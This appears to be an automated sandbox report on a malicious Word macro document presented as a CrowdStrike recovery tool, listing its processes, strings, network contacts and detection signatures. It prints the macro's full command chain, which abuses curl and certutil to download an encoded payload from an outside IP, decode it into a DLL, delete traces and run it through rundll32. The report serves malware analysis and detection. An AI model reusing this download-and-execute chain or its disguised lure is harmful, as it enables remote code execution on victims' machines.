Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_000000013F4DBAFC

Source: C:\Windows\System32\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	7_2_000000013F4A2B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	7_2_000000013F4CF964
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	22_2_000000013F322B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	22_2_000000013F34F964

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.14	sb-ssl.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.203.100	www.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
sb-ssl.l.google.com	172.217.168.14	true
www.google.com	142.250.203.100	true
sb-ssl.google.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,	7_2_000000013F4D9BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	7_2_000000013F4D9C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C9C CryptHashData,	7_2_000000013F4D9C9C
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,	22_2_000000013F359BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	22_2_000000013F359C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C9C CryptHashData,	22_2_000000013F359C9C

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_90c8dacc-4

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,

7_2_000000013F4A2738

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Jump to behavior

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sb-ssl.google.com

Source: unknown

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	String found in binary or memory: http://172.104.160.
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://aka.ms/WRH
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe	String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/P
Source: curl.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6529.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6690.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer7050.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer601A.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer60A7.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6873.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer6529.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490F28	7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F499B60	7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B1B00	7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F497BAC	7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4BCBDC	7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490658	7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F481AB0	7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AE4F0	7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F48A9B4	7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A49D0	7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AADC8	7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49BDE0	7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49B840	7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F484860	7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49F458	7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4C0804	7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4944A4	7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A88D8	7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490C74	7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B2C88	7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A7888	7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F331B00	22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F319B60	22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310F28	22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F33CBDC	22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F317BAC	22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310658	22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F301AB0	22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32E4F0	22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31BDE0	22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32ADC8	22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3249D0	22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F30A9B4	22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F340804	22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31F458	22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F304860	22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31B840	22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F332C88	22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F327888	22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310C74	22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3288D8	22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3144A4	22_2_000000013F3144A4

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: Sub Document_Open()

Document contains embedded VBA macros

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1F00 appears 134 times

Source: classification engine

Classification label: mal88.expl.evad.winDOCM@51/26@4/3

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

7_2_000000013F483434

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................H.......<...............#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........3)...............................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....	Jump to behavior
